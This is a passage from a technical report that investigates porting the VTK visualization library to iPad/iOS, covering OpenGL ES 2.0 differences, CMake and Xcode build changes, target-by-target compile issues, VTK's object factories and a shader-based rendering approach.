VTK (Visualization Toolkit) is an open source, cross-platform library for visualization, 3D graphics and image processing. VTK is supported by a very large community and is used in many fields, including medical applications and physics simulation. Given the wealth of tablet computers emerging on the market, there has recently been a large interest in the community for iOS support in VTK, or more generally, embedded systems support. For the moment VTK cannot be run on an iPad, because of a number of concerns, one of which is the lack of OpenGL support. It is far from trivial to make VTK compatible with the iPad/iOS. There are many more obstacles beyond graphics rendering that have to be taken into consideration in order to port VTK. In this report we investigate how VTK works at a technical level in order to get an understanding of how VTK can be modified to support OpenGL ES rendering and iOS.

# 2 Problem Statement

The work described in this report aims primarily at answering the following question:

*How may the Visualization Toolkit, which currently supports the operating systems Windows, Macintosh and Linux, and renders its graphics in OpenGL, be adapted to run on iPad/iOS?*

This general problem statement can be broken down into sub-problems.

1. What platform-specific assumptions does VTK make? What has to be modified, added or removed in order for VTK to compile and run on iOS?
2. How can VTK's graphics rendering be ported or re-implemented to support OpenGL ES 2 and iOS?
3. How is user interaction handled in VTK (e.g. mouse and keyboard input), and what needs to be modified in VTK to support multi-touch interaction in iOS?

# 3 Delimitations

The scope of the question asked is potentially very large.
In order to narrow down the area of investigation, the work will primarily concentrate on answering the question at a general level, which means that the aim is neither to make a runnable prototype of VTK on iOS, nor to give a detailed implementation proposal on how to make all parts of VTK iOS compatible. The main aim is to answer sub-questions one and two, which are assumed to be essential for making a proof of concept possible. The work will only concentrate on investigating the rendering capabilities of VTK and its dependencies. Higher-level VTK libraries will be left out.

# 4 Background

## 4.1 VTK

VTK (Visualization Toolkit) is an open-source software system for 3D graphics, image processing, and visualization [1]. VTK consists of a C++ class library with several interpreted interface layers including Tcl/Tk, Java and Python. VTK is cross-platform and currently runs on Linux, Windows, Macintosh and Unix.

VTK had a number of design goals in its early stages [2]. One is the toolkit philosophy that focuses on having well defined pieces of software with simple interfaces, which could be assembled into larger systems. The system should have an interpreted layer with a crisp boundary from the compiled core. The system needed to be portable; this suggests a high-level abstraction of 3D graphics that is independent of graphics libraries such as OpenGL. There are also issues with different windowing systems on different platforms, so the core system needed to be independent of windowing systems. Other important design goals were to use standard components and languages, to make the software freely available as open source, and to make the system as simple as possible for the end user, who might not have any knowledge of computer graphics and visualization.

## 4.2 VTK Graphics Model

The graphics model of VTK is designed to be easy to understand and use. It consists of a few basic core objects [3] that combined together create a scene.
**vtkProp/vtkProp3D (super-class of vtkActor, vtkActor2D, vtkVolume)**

Props represent the things that we “see” in a scene. Props can be positioned and manipulated. Props do not directly represent their geometry; instead they refer to mapper objects, which are responsible for representing data. A prop also refers to a property object, which controls the appearance of the prop, such as color, lighting effects, etc.

**vtkLight**

Lights are used to represent and manipulate lighting in a scene. Lights are only used in 3D.

**vtkCamera**

The camera object controls how 3D geometry is projected onto the 2D image plane during the rendering process. It defines, amongst other characteristics, the view, position and focal point.

**vtkProperty, vtkProperty2D, vtkVolumeProperty**

These objects represent the property objects that instances of vtkProp refer to.

**vtkMapper, vtkMapper2D, vtkVolumeMapper**

Mappers are used to transform and render geometry.

**vtkRenderer, vtkRenderWindow**

These objects are used to manage the interfaces between the graphics engine and the computer's windowing system.

Figure 1 shows an example of the inheritance of rendering classes in VTK that meet the above-mentioned requirements.

Figure 1: Inheritance diagram for vtkRenderWindow and subclasses

**vtkObject** is the base class for most objects in VTK; it provides methods for tracking modification time, debugging, printing, and event callbacks. **vtkWindow** is an abstract object for specifying the behavior of a window on the screen. **vtkRenderWindow** is an abstract object for specifying the behavior of a rendering window. It adds methods for synchronizing the rendering process, setting window size, controlling double buffering, support for stereo rendering and more. vtkOpenGLRenderWindow and vtkMesaRenderWindow are concrete implementations of vtkRenderWindow. vtkOpenGLRenderWindow interfaces with the OpenGL graphics library.
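The platform dispatch behind these concrete subclasses rests on an object factory: application code asks for an abstract render window and receives the concrete subclass for the current platform. A toy Python sketch of the idea (all names below are ours, loosely modeled on the vtk classes; this is not actual VTK code):

```python
class RenderWindowBase:
    """Stand-in for the abstract vtkRenderWindow interface."""
    def render(self):
        raise NotImplementedError

class DesktopGLWindow(RenderWindowBase):
    def render(self):
        return "rendered with OpenGL"

class MobileGLESWindow(RenderWindowBase):
    def render(self):
        return "rendered with OpenGL ES"

def new_render_window(platform):
    """Toy factory: pick the concrete window class for `platform`."""
    if platform == "ios":
        return MobileGLESWindow()
    return DesktopGLWindow()
```

Because callers only see the abstract interface, adding an iOS backend amounts to registering one more concrete class with the factory rather than touching application code.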
Application programmers use vtkRenderWindow instead of the OpenGL-specific version. A factory class determines which renderer is used. vtkCocoaRenderWindow and the other objects that inherit from vtkOpenGLRenderWindow are platform-specific implementations of vtkOpenGLRenderWindow that handle OS-specific windowing.

## 4.3 OpenGL

OpenGL is a standard specification defining a cross-language and cross-platform API for 2D and 3D graphics. OpenGL was developed by Silicon Graphics Inc. in 1992 and is used in many applications, amongst others CAD, visualization and video games. The Khronos Group [4] now manages OpenGL. The purpose of OpenGL is to hide the complexities of interfacing with different graphics hardware by presenting a single, uniform software interface. OpenGL accepts geometric primitives as input and converts them into pixels. This is done in the graphics pipeline known as the OpenGL state machine [5]. OpenGL commands issue primitives and configuration to be processed by the pipeline. Prior to OpenGL 2.0, each stage of the pipeline performed a fixed function and the user could only make configurations to a small extent. In version 2.0 and later the user is able to fully program parts of the pipeline using vertex and fragment (also known as pixel) shaders, as seen in Figure 2 and Figure 3.

Figure 2: Simplified OpenGL fixed function pipeline prior to OpenGL 2.0

Figure 3: Simplified OpenGL programmable pipeline, OpenGL 2.0 and later

## 4.4 OpenGL ES

The “ES” in OpenGL ES stands for Embedded System. There are three versions of OpenGL ES released so far: OpenGL ES 1.0, OpenGL ES 1.1 and OpenGL ES 2.0. This work will concentrate on OpenGL ES 2.0, which is defined relative to the OpenGL 2.0 specification. This section briefly outlines the OpenGL ES 2.0 specification relative to the OpenGL 2.0 specification. Henceforth OpenGL ES will be referred to as GLES.
The most significant changes in GLES 2.0 relative to GLES 1.1 are that the fixed-function transformation and fragment pipelines are not supported. Commands in GLES 2.0 cannot be placed in a display list for later processing, there is no polynomial function evaluation stage, and blocks of fragments cannot be sent directly to individual fragment operations. GLES 2.0 is designed for a shader-based pipeline and has no support for the fixed function pipeline. This means that a developer is forced to use, and needs to have knowledge of, shaders. GLES 2.0 does away with the glBegin/glEnd paradigm that was used for specifying geometry; it draws geometric objects exclusively using vertex arrays. Dedicated support for vertex position, normal, colors and texture coordinates is removed, since these can be represented using vertex arrays. The fixed function transformation pipeline can be replaced by calculating the necessary matrices in the application and loading them as uniform variables in the vertex shader. The code that transforms vertices is then executed in the vertex shader. Clipping against the view frustum is supported, while user-specified clip planes are not; user-specified clip planes can be emulated in the vertex shader. The fixed function lighting model is no longer supported; lighting can be implemented by writing appropriate vertex and/or fragment shaders. The texture environments present in OpenGL 2.0 are no longer supported; fragment shaders can replace the fixed-function texture functionality. Stencil tests and blending are supported with minor changes, while the alpha test is removed, since it can be done inside a fragment shader.

## 4.5 CMake

CMake is used by VTK to manage the build process. It is a cross-platform, open-source build system designed to build, test and package software. CMake is compiler independent and is designed to support directory hierarchies and applications that depend on multiple libraries.
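With the fixed-function matrix stack gone, the application computes its transformation matrices itself and uploads the result as a uniform variable (e.g. via `glUniformMatrix4fv`). A minimal, library-free sketch of the CPU-side arithmetic in Python (purely illustrative; a real port would do this in C/C++):

```python
def mat_mul(a, b):
    """Multiply two 4x4 matrices stored as row-major nested lists."""
    return [[sum(a[i][k] * b[k][j] for k in range(4)) for j in range(4)]
            for i in range(4)]

def translate(tx, ty, tz):
    """Translation matrix, replacing a fixed-function glTranslatef call."""
    return [[1, 0, 0, tx],
            [0, 1, 0, ty],
            [0, 0, 1, tz],
            [0, 0, 0, 1]]

def scale(s):
    """Uniform scale matrix, replacing a fixed-function glScalef call."""
    return [[s, 0, 0, 0],
            [0, s, 0, 0],
            [0, 0, s, 0],
            [0, 0, 0, 1]]

# The combined modelview matrix is computed on the CPU and would be
# passed to the vertex shader as a uniform instead of being built with
# glTranslatef/glScalef calls.
modelview = mat_mul(translate(1.0, 2.0, 3.0), scale(2.0))
```

The vertex shader then multiplies each vertex by this uniform matrix, which is exactly the work the fixed-function pipeline used to do implicitly.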
CMake generates native makefiles and workspaces that can be used in the compiler environment of your own choice. The only requirement CMake has is a C++ compiler. VTK uses CMake to support a platform-independent build process. CMake uses CMakeLists.txt files, which contain project parameters and describe the flow control of the build process [7]. These files are placed in every directory that wishes to control the build process. A CMakeLists.txt file includes one or more commands using the syntax "COMMAND(args...)", where "COMMAND" represents the name of the command and "args" a list of arguments. The basic data type in CMake is a string, but it also supports lists of strings. The following statement groups together multiple arguments into a list using the SET command.

```cmake
set(Foo a b c)
```

This results in setting the variable Foo to a b c, and Foo can be passed into another command using

```cmake
command(${Foo})
```

which is equivalent to

```cmake
command(a b c)
```

Furthermore, CMake provides flow control structures much like a regular programming language. Conditional statements:

```cmake
if(var)
  some_command(...)
endif(var)
```

Looping constructs:

```cmake
set(Foo a b c)
foreach(f ${Foo})
  some_command(${f})
endforeach(f)
```

Procedure definitions: functions create a local scope for a variable, and macros use a global scope.
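The practical consequence of the scope difference can be shown with a short sketch (hypothetical command names; runnable in script mode with `cmake -P`):

```cmake
set(Foo "outer")

function(overwrite_foo_function)
  set(Foo "from_function")  # local scope: the caller's Foo is untouched
endfunction(overwrite_foo_function)

macro(overwrite_foo_macro)
  set(Foo "from_macro")     # caller's scope: the caller's Foo changes
endmacro(overwrite_foo_macro)

overwrite_foo_function()
message(STATUS "after function: ${Foo}")  # Foo is still "outer" here

overwrite_foo_macro()
message(STATUS "after macro: ${Foo}")     # Foo is now "from_macro"
```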
The following is an example of a macro and its corresponding function:

```cmake
macro(loop_foo Foo)
  foreach(f ${Foo})
    some_command(${f})
  endforeach(f)
endmacro(loop_foo)

function(loop_foo Foo)
  foreach(f ${Foo})
    some_command(${f})
  endforeach(f)
endfunction(loop_foo)
```

The macro or function can then be called by writing:

```cmake
set(Foo a b c)
loop_foo("${Foo}")
```

**Hello World Example**

The figures below are examples of how a simple “Hello World” project [8] can be structured and configured using CMake.

---

**Figure 4:** Example of CMake directory structure for "Hello World" application

---

**Figure 5:** CMakeLists.txt files in "Hello World" application

5 Building VTK

5.1 CMake

Learning how to build VTK for iOS using CMake is not the main focus of this work; however, it became impossible to ignore. Some minor changes and settings were made to the CMake configuration of the project in order to get a better starting point for the XCode project that is generated by CMake. Since VTK does not support iOS at the moment, the CMake project is not customized to support building an iOS XCode project. Customizing the CMake files in VTK for complete iOS support would require a great deal of work. This is not the aim of the thesis and was therefore mostly omitted. In order to gain iOS support in the CMake build process one needs to customize CMake to cross-compile for iOS by adding iOS-specific logic. This means that new files have to be included in the project and any required platform libraries such as the iOS SDK must be linked into the build. Since the iPad does not support OpenGL, in which VTK's rendering is implemented, all OpenGL implementations must be replaced with OpenGL ES implementations.
To do this, it is necessary to know which implementing files these changes concern. These files must be added to the CMake project hierarchy, and relevant CMake files have to be modified to add the correct files to the build depending on which platform we are building for. An example of where cross-compiling support needs to be added is in the directory rendering, which is located directly under the project's root directory. There is a "CMakeLists.txt" in the rendering directory, which describes, amongst other things, which files are included in a specific target, in this case the rendering target. There are also references to any dependencies on other targets, platform concerns and more. The figure below is an extract of the mentioned CMake file. The Kit_SRCS set contains files in the rendering target, which are classes general to the VTK rendering framework, independent of the concrete rendering implementation. The framework classes are inherited by concrete rendering implementations like the ones in KitOpenGL_SRCS. These files are concrete OpenGL implementations and therefore need to be omitted when building the project for iOS. We instead need to include new OpenGL ES specific class files. Figure 7 is a simplified example of how one could modify the CMakeLists.txt file to support building for iOS. Changes are marked with bold text.
```cmake
# vtk_root/rendering/CMakeLists.txt
SET(KIT Rendering)
SET(UKIT RENDERING)
SET(KIT_TCL_LIBS vtkGraphicsTCL vtkImagingTCL ${VTK_TK_LIBRARIES})
SET(KIT_PYTHON_LIBS vtkGraphicsPythonD vtkImagingPythonD)
SET(KIT_JAVA_LIBS vtkGraphicsJava vtkImagingJava)
IF (JAVA_AWT_LIBRARY)
  SET(KIT_JAVA_LIBS ${KIT_JAVA_LIBS} ${JAVA_AWT_LIBRARY})
ENDIF (JAVA_AWT_LIBRARY)
SET(KIT_INTERFACE_LIBRARIES vtkGraphics vtkImaging)
SET(KIT_LIBS vtkIO vtkftgl ${VTK_FREETYPE_LIBRARIES})
#INCLUDE(${VTK_CMAKE_DIR}/vtkTestGL.cmake)
#INCLUDE(${VTK_CMAKE_DIR}/vtkTestGLX.cmake)
IF(APPLE AND VTK_WRAP_JAVA)
  ADD_DEFINITIONS("-ObjC++")
ENDIF(APPLE AND VTK_WRAP_JAVA)
SET( Kit_SRCS
  vtkActor.cxx
  vtkCamera.cxx
  # Additional files included in Kit_SRCS set
)
# ...
SET( KitOpenGL_SRCS
  vtkOpenGLActor.cxx
  vtkOpenGLCamera.cxx
  # Additional files included in KitOpenGL_SRCS set
)
```

Figure 6: Extract from CMakeLists.txt under the VTK rendering directory

In order for the example to work, the IOS_IPAD and USE_GLES variables must be defined and set somewhere. This is done in a toolchain [9] configuration file, which in short is a file that defines the settings for the build environment and the target platform. Among these are: system properties, compiler and compiler options, processor architecture, linked libraries and build properties. The toolchain file is passed as an argument to CMake when building.

5.2 XCode

After configuring CMake, an XCode project can be built using the CMake command line tool or the CMake GUI. Since the CMake files were not adapted to cross-compile and build for iOS, the delivered project will have build settings matching the environment it was built on, in this case OS X. The settings involve architecture, build location, build options, code signing, linking, packaging, search paths and more. Some of these settings have to be changed in order to compile the code for the iOS platform.
![Figure 8: Xcode build settings](image)

The following changes were made to the build settings for each target in the VTK project.

**Architecture:** The hardware architecture of a Mac differs from that of an iOS device, so the target architecture must be changed. Changed from “32/64-bit Intel” to “Optimized armv7”.

**Base SDK:** The iPad does not support the Mac OS X SDK. The Base SDK flag has to be changed to the iOS SDK that is being used. Changed from “Mac OS X 10.6 SDK” to “iOS 4.3”.

**Supported platforms:** Changed from “macosx” to “iphonesimulator iphoneos”.

**Valid architectures:** Changed from “i386 x86_64” to “armv6 armv7”.

**iOS deployment target and Targeted Device Family:** These flags determine which iOS SDK and device the project uses in deployment. In this case iOS 4.3 and iPad.

**Code signing:** To be able to submit an application to the App Store the code must be signed [10]. To do this, a developer profile has to be set up in XCode. When a profile is configured correctly, code signing is set up using the code signing identity flag, where a profile is selected for signing. Code signing will not be necessary in this case since there will be no attempt at submitting a working application to the App Store; however, an Apple-approved developer profile still needs to be set up in order to test the software on an actual iOS device.

5.3 iOS - Simulator and Hardware

To compile, build and run a target, a platform on which to compile the code must be selected for the requested target. This is easily done in XCode via the GUI. Available platforms depend on the build settings for each target. In this case, since the build settings were changed to be iOS compatible, the selectable platforms are “iPad 4.3 Simulator” and “iOS device”. If the application is built and executed using the iPad simulator, the application is launched in a simulated iPad environment on the local development machine.
If we instead choose to build and run on an iOS device, an iPad has to be connected to the computer via USB, and a developer profile must be set up as described earlier.

Figure 9: Running an OpenGL ES 2 application on an iPad Simulator in XCode

6 Compiling and Running VTK on iOS

6.1 System overview

VTK consists of several targets with some interdependencies. The targets can be considered logically delimited parts of the system. Below are some examples of the more central targets in play.

vtkCommon

Contains the most general types of classes. Most other targets depend on vtkCommon. The target provides some basic patterns used by the system, and an extensive number of data structures such as vtkObjectBase, vtkObject, vtkObjectFactory, vtkAbstractArray, vtkParametricTorus, vtkMath and more.

vtkIO

As the name suggests, this target is responsible for data input and output. vtkIO depends on many other targets, amongst those vtkjpeg and vtkpng, which are needed to handle reading and writing of JPEG and PNG files.

vtkFiltering/vtkGraphics

These targets contain classes representing graphical data and the transformation/filtering of graphical data. vtkGraphics depends on vtkFiltering, which holds basic graphical objects such as vtkVertex, vtkQuad, vtkPolyData and vtkSpline, and classes for graphics transformation and filtering. vtkGraphics includes more complex graphical objects and classes responsible for transforming and filtering, e.g. vtkQuadraticClustering and vtkRibbonFilter.

vtkRendering

This is the target containing the classes responsible for rendering graphics to a device. It is an integral part of the thesis and will be studied thoroughly in coming chapters.

6.2 vtkRendering Target Dependency Hierarchy

Figure 10 illustrates the target dependency hierarchy of the vtkRendering target. This implies that all dependent targets must compile and run for vtkRendering to compile.
Some targets are able to compile and run out of the box, while others need modification and/or major changes. This is described thoroughly in the coming chapter.

---

Figure 10: Target dependency hierarchy for vtkRendering

6.3 Modifying Targets

This chapter describes how VTK was modified to provide code that compiles and runs on iOS, without the actual implementation of the rendering. Only vtkRendering and its library dependencies are taken into consideration. This leaves out some higher-level parts of VTK, such as vtkVolumeRendering, vtkHybrid and vtkWidgets, which all depend on vtkRendering. The main approach to compiling and running vtkRendering was trial and error. Since little was known about VTK and what is potentially compatible with iOS and what is not, no effort was put into modifying the build process in CMake. Instead, a Mac OS build produced with CMake was used as a starting point and the project was modified thereafter. This of course breaks the cross-platform support that CMake provides, though our primary focus is to investigate how to modify VTK for iOS support, which is a prerequisite for extending the build process.

Vtkftgl and vtkFreetype

Vtkftgl has some minor OpenGL implementations of font rendering. To maintain font rendering support this target needs reimplementation in GLES 2.0. Vtkftgl depends on vtkFreetype [11], a wrapper around FreeType, which is a free software font engine written in C. There is no iOS binary of FreeType available, but with the source being written in C and free to download, it is possible to build an iOS-compatible binary [12]. The vtkFreetype target only needs to be linked with an iOS-compiled FreeType binary.

VtkGraphics, vtkCommon, vtkFiltering and vtkVerdict

The vtkGraphics target, along with its dependencies (vtkCommon, vtkFiltering, vtkVerdict), was successfully compiled and run on an iPad simply by configuring the build settings for iOS.
VtkImaging

VtkImaging is a library in VTK providing basic image processing functionality such as high/low-pass filtering, calculating the image gradient, the Laplacian, and many other standard image processing tasks. This target can also produce a working iOS binary simply by changing the build settings.

VtkIO

VtkIO is in its current state incompatible with iOS. It depends on a command line tool, which is executed during compilation to generate files needed by vtkIO. Command line tools are not supported on iOS, hence compile errors are produced when trying to build the target. The command line tool that vtkIO depends on is responsible for creating GLSL [13] shader files that are written to a material library folder. This dependency was removed, since support of built-in shaders is not a priority. In order to support the creation of shaders during compilation, either the code that creates the shaders needs to be changed so that it is not a command line tool, or alternatively shaders for iOS devices can be generated once and prepackaged with VTK.

VtkIO also depends on the target vtktiff, which in turn depends on an additional command line tool target. This target is responsible for initializing and writing fax decoder tables [14] and Huffman code tables [15] to files, which are included in the build and used by vtktiff. Just as with the shader files, either the code needs to be changed so that it is not a command line tool, or the files can be created once for iOS and prepackaged with VTK. The vtktiff target was removed as a dependency of vtkIO. This essentially removes support for file compression and decompression. Additionally, some other classes had to be removed from vtkIO for compilation to succeed. These are classes for decoding and encoding video, such as Video for Windows [16], MPEG-2 [17] and oggtheora [18]. Furthermore, classes for interfacing with MySQL and PostgreSQL databases do not compile because necessary header files are missing.
iOS support for the mentioned classes could possibly be added but is considered out of scope for this work. With these modifications done, the vtkIO target compiles and runs on iOS.

VtkParseOGLExt

The target is a command line tool, executed by the vtkIO target before compilation, which reads OpenGL extension header files and outputs VTK code that handles OpenGL extensions in a more platform-independent manner. It takes as input an OpenGL extensions header file (glext.h), a GLX extensions header file (glxext.h) and a WGL extensions header file (wglext.h) [19], and writes a new header file for handling OpenGL extensions (vtkgl.h). The tool is based on OpenGL and writes OpenGL-specific code to the generated header. The generated file is not compatible with iOS since it, amongst other things, includes OpenGL-specific header files. The tool needs to be rewritten, or preferably a new tool needs to be made, that handles extensions for OpenGL ES.

VtkEncodeString

VtkEncodeString, also a command line tool, is used to encode a text file as a string in a C++ file. It is used by vtkRendering to encode GLSL [13] source files. The program itself is compatible with iOS, but not its command line execution, which needs to be modified.

VtkRendering

The rendering implementations of VTK require major changes in the form of new GLES 2.0 implementations to run on an iPad or any other GLES 2.0 compatible device. This proved to be a comprehensive task, since the OpenGL rendering implementation in VTK makes wide use of the fixed function pipeline, which is not supported in GLES2. A new vtkRendering target was created specifically for iOS, holding the VTK rendering classes to which new GLES2 and iOS specific implementations could be added.

7 VTK Frameworks

This chapter describes relevant frameworks and design patterns used by VTK, which one must know in order to extend and/or customize the source for new platform support.
7.1 Rendering

The core of the VTK rendering framework is located within the vtkRendering target. VtkRendering consists of a set of abstract classes that make up an API with the necessary rendering elements to describe a scene. Examples are the classes vtkRenderer, vtkRenderWindow, vtkLight, vtkCamera, vtkActor and vtkProp, which combined in code make up a scene that is rendered onto a device. The classes mentioned do not perform any actual rendering, since rendering depends on the underlying hardware and software. The VTK rendering classes are abstract and need in part to be implemented or extended to perform the actual rendering. The rendering framework is independent of the underlying implementations, which is one of the design goals of VTK [2]. This section describes how a minimal rendering context can be created and how VTK objects interact to choose the rendering implementations for the desired platform. A minimal rendering context in this case is defined as the instances of the VTK classes needed to display a window in iOS using the VTK framework. Creating and running a minimal rendering context in VTK is demonstrated by the following code.

```cpp
#include "vtkRenderWindow.h"
#include "vtkRenderer.h"
#include "vtkSmartPointer.h"

int main(int argc, char *argv[])
{
  vtkSmartPointer<vtkRenderWindow> window =
      vtkSmartPointer<vtkRenderWindow>::New();
  vtkSmartPointer<vtkRenderer> renderer =
      vtkSmartPointer<vtkRenderer>::New();

  window->AddRenderer(renderer);
  window->Render();
  return 0;
}
```

As the code suggests, first a window is created by calling the function “New” on vtkRenderWindow, or in this case on vtkSmartPointer, which delegates to vtkRenderWindow and returns the platform-specific implementation of a vtkRenderWindow. The next step is to create a renderer object. The renderer is added to the render window. Calling the function Render on the window renders the current state of the scene onto the window.
In this case the result is a black window, since no geometry, materials, lights or cameras are added to the scene.

**VtkRenderWindow**

VtkRenderWindow is an abstract object that specifies the behavior of a rendering window. A rendering window is a window in a graphical user interface where images are drawn. Figure 11 shows the inheritance diagram for vtkRenderWindow. Polymorphism [20] is widely used in VTK to create layers of abstraction. VtkRenderWindow defines several virtual functions that are inherited and partly implemented by vtkOpenGLRenderWindow. Since OpenGL does not handle platform-specific windowing systems, some functions are inherited further down to the concrete platform-specific implementations of window handling.

![Inheritance diagram of vtkRenderWindow](image)

**Figure 11: Inheritance and subclass diagram of vtkRenderWindow**

Most VTK objects inherit directly or indirectly from the class vtkObject. VtkObject provides some basic functions, one of which is the function “New” that takes no parameters and returns a vtkObject pointer. Inheriting classes override this function to instantiate an object of the calling class. Often the function “New” delegates the instantiation to an object factory that determines which implementation is going to be used.

![Class and collaboration diagram for instantiating a vtkRenderWindow](image)

**Figure 12: Class and collaboration diagram for instantiating a vtkRenderWindow**

Figure 12 shows how calling the “New” function creates a vtkRenderWindow object. VtkRenderWindow does not create an object itself but instead delegates to vtkGraphicsFactory, which determines which implementation will be used given the class name as a parameter. VtkGraphicsFactory in turn delegates to vtkObjectFactory, which tries to create the object. If vtkObjectFactory fails, control falls back to vtkGraphicsFactory. In the case of vtkRenderWindow, vtkGraphicsFactory is responsible for instantiation.
VTK extensively uses macro definitions [21] to define which libraries the build supports. To support iOS, new macro definitions have to be added to follow the design patterns. The macros are defined in the CMake configuration and are set during the CMake build process. For this project, the macros are hard-coded for the sake of simplicity. The graphics factory creates an instance of the concrete implementing class vtkIOSRenderWindow, which inherits vtkGLESRenderWindow, and returns an object of the type vtkRenderWindow. From a VTK user's point of view, concrete implementation classes are never handled; these are, as described, handled by the framework, and the user only needs to know how the abstract VTK classes work to implement the rendering functionality.

**vtkRenderer**

VtkRenderer provides an abstract specification for renderers. A renderer controls the rendering process for objects. Rendering is the process of converting geometry, specifications of lights and a camera view into pixels. The Render function of vtkRenderWindow loops through each renderer that exists in the window and draws the image produced by each renderer. The vtkRenderer instance is created analogously to vtkRenderWindow, as demonstrated in the previous section. In fact, the vtkGraphicsFactory class creates all graphics objects. As mentioned, the creation of objects must be modified to create the new GLES2 and iOS specific implementations.

![Inheritance and subclass diagram of vtkRenderer](image.png)

Extending VTK factories

To make the iOS adaptation of VTK usable it is necessary not to break the design pattern for creating VTK objects. In an ideal situation, a visualization application that uses VTK should work on an iPad without modification to the application itself, simply by building against an iOS binary of VTK. Calling the static function named “New” on a VTK class creates an instance of the desired class with the underlying implementation hidden.
Of course the programmer could create an instance of the desired concrete implementation of the class, which is not the recommended usage of VTK, but that would make the application platform dependent. The call to “New” delegates to a factory class with the class name as a parameter and receives a concrete implementation of that class, cast to the caller's type, if one can be found. VtkObjectFactory is the base factory class that other factories subclass. In the case of graphics objects, which are our main concern, object creation is delegated to a graphics factory. The function of the graphics factory is straightforward. Given a class name and a set of predefined macros, the factory simply uses the macros to determine which platform is being used and the class name to determine which object to create. Below is an extract from the class vtkGraphicsFactory to demonstrate this.

```cpp
#ifdef VTK_USE_COCOA
  if( !vtkGraphicsFactory::GetOffScreenOnlyMode() )
    {
    if( strcmp( vtkclassname, "vtkRenderWindowInteractor" ) == 0 )
      {
      return vtkCocoaRenderWindowInteractor::New();
      }
    }
  if( strcmp( vtkclassname, "vtkRenderWindow" ) == 0 )
    {
    return vtkCocoaRenderWindow::New();
    }
#endif
```

At this point in the code, if we are building for Mac OS, are using Cocoa and vtkclassname is “vtkRenderWindow”, an instance of vtkCocoaRenderWindow will be created and returned to vtkRenderWindow, which will cast the instance to a vtkRenderWindow. One could extend this approach, add macro definitions for iOS and GLES2, and return instances of new implementations of the necessary classes. An alternative method would be to create a new graphics factory specifically for GLES2 implementations, which is delegated to from the main graphics factory, or added to the vtkRendering target in place of the current graphics factory during the build process.

7.2 Window and View handling

A window in iOS differs from windows on VTK's supported operating systems in that an iOS window has a more limited role.
Window objects in iOS are called UIWindow, compared to NSWindow on Mac OS. An iOS application can technically have more than one window, with windows layered on top of each other, but an application is by convention limited to a single window. A UIWindow always occupies the entire screen, has no title or controls, and cannot be manipulated by the user [22]. This of course adds the limitations of not being able to manipulate windows (resizing) and of only showing one window at a time while using VTK on iOS. Although the goal is to make the usage of VTK on iOS transparent for the user, these limitations must be taken into consideration when creating applications. The role of a UIWindow is to display the application's visible content; it delivers touch events to the views and other objects and handles orientation changes. A UIWindow can be created using xib files (a file format defining user interfaces for OS X and iOS) or programmatically during application startup. A UIWindow can hold one or many views. A view is responsible for drawing content into its rectangular area and for handling touch events. Views in iOS are of the type UIView and can be subclassed to create custom views. For VTK, a GLES 2.0 view is needed for rendering.

UIWindow

A UIWindow naturally maps to vtkRenderWindow. The vtkRenderWindow is responsible for setting up and manipulating windows, as is UIWindow. To implement our own iOS window for VTK we need to subclass vtkRenderWindow. VtkRenderWindow has a number of virtual functions that are left to the implementing classes to handle, such as the virtual functions “Start()”, “Render()” and “Finalize()”. “Start()” initializes the rendering process, “Render()” asks each renderer owned by the render window to render its image, and “Finalize()” ends the rendering process.
An iOS application is launched in the main function using the following function call [23]:

```c
int UIApplicationMain(
    int argc,
    char *argv[],
    NSString *principalClassName,
    NSString *delegateClassName
);
```

The call creates the application object and the application delegate and sets up the event cycle. The arguments argc and argv are usually the same parameters as those passed to the main function. PrincipalClassName is the name of the UIApplication class or subclass; this is usually set to nil, which assumes UIApplication.

7.3 Porting OpenGL to OpenGL ES 2.0

The most time-consuming concern in making VTK iOS compatible is changing the rendering implementation from OpenGL to GLES 2.0. Since VTK has as a design goal to be platform independent and rendering-library independent, the framework is created independently of OpenGL, although VTK currently only supports OpenGL rendering. This practically means that we can create new classes that implement the abstract VTK rendering classes as we see fit and create new factories that override the old ones. We could completely disregard the current rendering implementations and start implementing GLES2 code from scratch. This work does not concentrate on creating the actual implementations of GLES2 rendering, but on investigating how it could be done. One approach is, as mentioned, to throw away the OpenGL implementations and start from scratch. This would require extensive knowledge of how the rendering framework is supposed to work and a great deal of trial and error, since we would only have to subclass the VTK rendering classes and rely on the VTK documentation to give us hints about what each implemented function should do.
Another approach, which might be faster and require less VTK framework knowledge, is to create the implementing classes and try to copy as much of the current OpenGL code as possible. This is possible since GLES 2.0 is defined as a subset of OpenGL 2. The first step would be to identify the differences between OpenGL 2 and GLES 2.0. The API documentation for each library gives us a list of the functions that are available. The design difference between OpenGL 2 and GLES2 is in principle that whatever is not supported in GLES2 can be done with shaders. Upon identifying code that uses the unsupported fixed function pipeline, that code can be removed and replaced by loading the corresponding fragment and vertex shaders. As an example, the class vtkOpenGLLight is responsible for specifying light sources in a scene. It implements a single function, Render(), that specifies each light source by calling the OpenGL function glLightfv. The function call is not supported by GLES 2.0 and therefore needs to be replaced with shaders. Instead of making the function call, we can pass the light specifications to the shaders (typically as uniform variables) and load the vertex and fragment shaders for the desired lighting effect. The same approach can be applied to texturing, geometry transformation and other unsupported OpenGL functions. Instead of calling the function, we store the necessary shading information in vertex arrays and uniform variables and load the desired shader programs before rendering our geometry.

**Shaders**

Although VTK mostly uses the fixed function pipeline to perform its rendering, shaders using GLSL are supported. VTK provides a framework for handling shaders, covering tasks such as compiling, loading and binding shader programs and applying different shaders to different vtkActors. Shaders in VTK are encapsulated in a material [24]. A material is described in an XML file.
The material description includes:

- Which vertex and fragment shaders to use
- Shader language
- Entry routine of the shader
- Uniform variables passed to the shaders
- Surface properties such as ambient and specular color

A material is applied to an actor by calling vtkProperty::LoadMaterial(const char*) on the actor's vtkProperty object instance. When a material is loaded, the vtkProperty is updated with the data in the material file and the appropriate subclass of vtkShaderProgram is instantiated. VtkShaderProgram compiles and binds a shader every time an actor is rendered [25]. To go from the fixed function pipeline to a completely shader-based rendering in VTK, we first need to create a library of GLSL shaders and define XML material files. In VTK, materials are optionally added to vtkProperty. If GLES2 is used as the concrete rendering implementation, this can no longer be optional: materials must always be added to vtkProperty objects in order to use shaders. Once the fixed function rendering is removed in favor of shaders, a standard set of materials applied by default can replace the functionality of the current rendering implementation, practically making it optional to use materials again.

7.4 Interaction

Another aspect that differentiates the iPad from currently supported VTK platforms is its interaction capabilities. Instead of using a traditional mouse to transform the camera and geometry, one uses the multi-touch support of the iPad to perform gestures. This section gives a brief introduction to the interaction capabilities of the VTK framework and some insights on multi-touch gestures with VTK on the iPad.

VTK interaction framework

